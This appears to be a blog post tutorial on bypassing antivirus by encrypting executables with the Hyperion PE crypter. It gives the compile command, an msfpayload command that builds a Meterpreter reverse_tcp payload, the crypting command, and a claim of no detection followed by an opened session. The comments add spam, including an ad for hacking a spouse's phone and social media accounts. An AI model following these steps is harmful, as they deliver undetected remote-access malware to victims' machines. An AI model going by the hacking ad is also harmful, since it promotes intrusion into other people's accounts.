Bypassing Antivirus with PE Crypters

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget

Unzip It. 

Change the directory, and compile it.
wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe

Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > msf1.exe

Scan it. 
Once the payload is ready, we will scan it first (without crypting).

Lets Crypt it with Hyperion.
wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe
ls -l

Scan it.
No Detection

Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.

Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.

I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

 You can learn Ehtical Hacking from the Infosec Institute, one of the leading institute in the field of Information Security training:

Learn Android Pentesting Part 1 From this resource:


  1. Wouldn't AV which scan memory detect the exploit?

  2. Yeah, those AVs who perform scans on memory will detect it just because of an Anomaly behaviour.

    Apart from that it will byepass signature based AVs easily.

  3. otr214427
    Work from home theory is fast gaining popularity because of the freedom and flexibility that comes with it. Since one is not bound by fixed working hours, they can schedule their work at the time when they feel most productive and convenient to them. Women & Men benefit a lot from this concept of work since they can balance their home and work perfectly. People mostly find that in this situation, their productivity is higher and stress levels lower. Those who like isolation and a tranquil work environment also tend to prefer this way of working. Today, with the kind of communication networks available, millions of people worldwide are considering this option.

    Women & Men who want to be independent but cannot afford to leave their responsibilities at home aside will benefit a lot from this concept of work. It makes it easier to maintain a healthy balance between home and work. The family doesn't get neglected and you can get your work done too. You can thus effectively juggle home responsibilities with your career. Working from home is definitely a viable option but it also needs a lot of hard work and discipline. You have to make a time schedule for yourself and stick to it. There will be a time frame of course for any job you take up and you have to fulfill that project within that time frame.

    There are many things that can be done working from home. A few of them is listed below that will give you a general idea about the benefits of this concept.

    This is the most common and highly preferred job that Women & Men like doing. Since in today's competitive world both the parents have to work they need a secure place to leave behind their children who will take care of them and parents can also relax without being worried all the time. In this job you don't require any degree or qualifications. You only have to know how to take care of children. Parents are happy to pay handsome salary and you can also earn a lot without putting too much of an effort.

    For those who have a garden or an open space at your disposal and are also interested in gardening can go for this method of earning money. If given proper time and efforts nursery business can flourish very well and you will earn handsomely. But just as all jobs establishing it will be a bit difficult but the end results are outstanding.

    Freelance can be in different wings. Either you can be a freelance reporter or a freelance photographer. You can also do designing or be in the advertising field doing project on your own. Being independent and working independently will depend on your field of work and the availability of its worth in the market. If you like doing jewellery designing you can do that at home totally independently. You can also work on freelancing as a marketing executive working from home. Wanna know more, email us on and we will send you information on how you can actually work as a marketing freelancer.

    Internet related work
    This is a very vast field and here sky is the limit. All you need is a computer and Internet facility. Whatever field you are into work at home is perfect match in the software field. You can match your time according to your convenience and complete whatever projects you get. To learn more about how to work from home, contact us today on workfromhome.otr214427@gmail.comand our team will get you started on some excellent work from home projects.

    Diet food
    Since now a days Women & Men are more conscious of the food that they eat hence they prefer to have homemade low cal food and if you can start supplying low cal food to various offices then it will be a very good source of income and not too much of efforts. You can hire a few ladies who will help you out and this can be a good business.

    Thus think over this concept and go ahead.

  4. If you've been infected with it, you probably already know that Antivirus XP 2008 removal can be a daunting task - but only depending on what approach you take to getting rid of it as it really can be as easy or as hard as you want it to be.

  5. With the primary sweep you will then be taken through a smaller than usual instructional exercise, which likewise demonstrates existing infections and malware that should be expelled and in addition helps you in redoing your frameworks outputs and insurance levels. With the recognition of dangers, you are given a meaning of the risk to your PC and the level of risk included.

  6. Beeindruckend! Guter Eintrag! Der Inhalt ist sehr reich, und ich mag es wirklich. Es hilft mir sehr, einige Probleme zu lösen. online kaufen

  7. Contact if you suspect your spouse cheating on you and acting suspicious they helped me in hacking my husbands phone and all his social media accounts Facebook twitter and much more and i have gotten all the information that would help me in my divorce please contact them we women dont deserve a cheating husband simply send them an Email- or call or text +1 512 605 1256 tell them Tracey referred you he would help out